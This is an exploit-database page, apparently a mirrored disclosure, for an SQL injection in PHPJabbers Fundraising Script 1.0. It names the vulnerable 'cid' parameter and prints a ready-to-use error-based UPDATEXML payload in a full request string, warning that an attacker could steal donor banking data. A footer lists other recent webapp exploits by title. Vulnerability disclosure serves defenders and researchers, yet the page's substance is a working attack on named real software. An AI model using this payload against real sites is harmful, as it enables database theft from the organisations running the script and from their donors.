Fundraising script 1.0 sqli Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-01-29 | Type : webapps | Platform : php
This exploit / vulnerability Fundraising script 1.0 sqli is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

## Title: Fundraising Script-1.0 SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `cid` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the cid parameter, and a database error
message was returned.
The database is empty, but if it is not, this will be over for the
money of the donors and their bank accounts!
The attacker can steal all information from the database!

[+]Payload:
mysql

Parameter: cid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
(ELT(1741=1741,1))),0x7162787171),3873))

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>

Fundraising script 1.0 sqli


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Fundraising script 1.0 sqli Vulnerability / Exploit